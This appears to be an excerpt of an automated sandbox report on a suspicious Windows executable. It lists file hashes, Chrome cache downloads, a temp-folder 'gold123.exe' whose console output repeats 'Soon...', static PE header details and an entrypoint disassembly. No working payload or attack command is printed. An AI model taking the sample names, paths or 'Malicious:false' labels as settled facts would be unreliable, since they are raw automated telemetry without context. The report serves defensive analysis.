                                                                                                                                                                                                                                                  SSDEEP:6:jZgbXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0luut0:lgrf2RKQ1CGAFAjzvYRQVuut0
                                                                                                                                                                                                                                                  MD5:AE724BE3A8F2A7AB5DA419C758FB95B6
                                                                                                                                                                                                                                                  SHA1:B78A7621E1427821097F230B19A40266398A09A8
                                                                                                                                                                                                                                                  SHA-256:EEBDFE2A4F8EA628EE965087CEB2362052444071794C045C8C3BCEEFEC454ED5
                                                                                                                                                                                                                                                  SHA-512:020EDE9ABD72D903E09CDFF01D0FE3C16E532D004F1192F3F68B9231B5C5F8E60CC979CB2218859412E68375B229202450EFEAAD10E0D420EDBEFE29A5B86292
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:....=I?..UdG......#F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................3.@3P.........................

                                                                                                                                                                                                                                                  Chrome Cache Entry: 193

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (833)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                                                  Entropy (8bit):5.133466978001967
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:v8K6IqEDIyHmBHslgT9lCuABATguoB7HHHHHHHYqmffffffo:0K6tVyHmKlgZ01BA8uSEqmffffffo
                                                                                                                                                                                                                                                  MD5:B725105B6DE8D0965DCCF42EEC4A015D
                                                                                                                                                                                                                                                  SHA1:CA3BB227803BDECB9DC16A409B26BA5E8C9AF1A0
                                                                                                                                                                                                                                                  SHA-256:795C43E7A829DB5E0CBC0E3B64DBD53D15B990F185C48CEEA5EA0D4383EA88CA
                                                                                                                                                                                                                                                  SHA-512:09BA8E3466AA53A532A93E43CF164765B1D82DD5BAD67177CA9B3B4113E5C1A597D38F4C3ABB77AFF3ABFF86CD4310A77374F35D60E6DD1B5F1DFF5F0E3C7176
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                  Preview:)]}'.["",["gta 6 release date","marvel movies 2025","yellowstone supervolcano eruption","las cuatro milpas restaurant closure","love me movie trailer","college football playoff notre dame","apple siri class action lawsuit","ps plus monthly games"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":44791501781198638,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                                                  Chrome Cache Entry: 194

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):117446
                                                                                                                                                                                                                                                  Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                  MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                  SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                  SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                  SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                  Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

                                                                                                                                                                                                                                                  Chrome Cache Entry: 195

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                  Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                  MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                  SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                  SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                  SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                  Chrome Cache Entry: 196

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):132729
                                                                                                                                                                                                                                                  Entropy (8bit):5.436599114713726
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:f7kJQ7O4N5dTm+syHEt4W3XdQ4Q6huSr/nUW2i6o:f+Q7HTt/sHdQ4Q6hDfUW8o
                                                                                                                                                                                                                                                  MD5:6F34F4373CAE9D18FE4ABE0DD0EA7186
                                                                                                                                                                                                                                                  SHA1:600F54A84FF0B2DDEC8E2955BFCF957C37588605
                                                                                                                                                                                                                                                  SHA-256:B603EE630E5E63798C4A49741D03988F78FC35D8D8FF934E05C2F2A94C373EFC
                                                                                                                                                                                                                                                  SHA-512:C1F68C22FB4B0FEFC2473B7129E5F3BB293B6317B798B0C576726D04A7DD674E01FAEFF7A8D305BAABFF2FB3E9804532A379ED609B0C984A50BEE2289DC340F1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                  Chrome Cache Entry: 197

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):175897
                                                                                                                                                                                                                                                  Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                                                  MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                                                  SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                                                  SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                                                  SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                                                  Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

                                                                                                                                                                                                                                                  Chrome Cache Entry: 198

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):5162
                                                                                                                                                                                                                                                  Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                  MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                  SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                  SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                  SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                  Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                  Chrome Cache Entry: 199

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):1660
                                                                                                                                                                                                                                                  Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                  MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                  SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                  SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                  SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                  \Device\ConDrv

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):105882
                                                                                                                                                                                                                                                  Entropy (8bit):2.6415325072564495
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:EEEUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUl:O
                                                                                                                                                                                                                                                  MD5:AF5A4759082D5DE162C1DDBA2B49BED4
                                                                                                                                                                                                                                                  SHA1:B87A417B2E1EC7C5A6BFC4B21CD29F6A6CF22FB0
                                                                                                                                                                                                                                                  SHA-256:8478F859B96554C624564631794AE2FF91A64F3D354781B171F5139E0702F6D5
                                                                                                                                                                                                                                                  SHA-512:15C6E749259350A8A29F85292D69203C9B0852177F6081FC922F85606C21F5E0C7300E2C563CB4096E5A9FA787CB86A33737FA3632449F9FCA50BAE97931D924
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Soon... Soon.....Soon... Soon.....Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon

                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Entropy (8bit):6.72713315937738
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                  File name:ebjtOH70jl.exe
                                                                                                                                                                                                                                                  File size:3'267'072 bytes
                                                                                                                                                                                                                                                  MD5:f775d21b5bfde4169416087324a43543
                                                                                                                                                                                                                                                  SHA1:30dbffdc709395bbd168ad9bee1b17239ac31dbf
                                                                                                                                                                                                                                                  SHA256:9b85ae26f1588d1238395258076430b282476882128aeec79066bf10af37d8e2
                                                                                                                                                                                                                                                  SHA512:a793bffd6ae99102848fd0bb3a93c47e4ca1bf3c69065458b82580d2537d3c0080ded014d2003892ca17f322d8f80833288d5a2c1d896a25d69fe68df4b27bd9
                                                                                                                                                                                                                                                  SSDEEP:49152:ZNJgBn8wNcPJvBqIHt0AWLx5zLpBBYAzH1k4JE5ygxR6E3lQ:NgN8wkFBVHGbLx5zLBYQJEl768lQ
                                                                                                                                                                                                                                                  TLSH:87E54AF2B50562CBD4CE1B788227EE4A599D42A98720C8C79C6C65FE7DA3CC125F9C34
                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                  Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Entrypoint:0x71e000
                                                                                                                                                                                                                                                  Entrypoint Section:.taggant
                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                  Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                  jmp 00007F0DD12ADB1Ah
                                                                                                                                                                                                                                                  popcnt esi, dword ptr [ecx]
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add cl, ch
                                                                                                                                                                                                                                                  add byte ptr [eax], ah
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [0000000Ah], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax+eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  and al, byte ptr [eax]
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add cl, byte ptr [edx]
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  xor byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add dword ptr [edx], ecx
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  pushad
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [ecx], al
                                                                                                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add eax, 0000000Ah
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [ecx], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
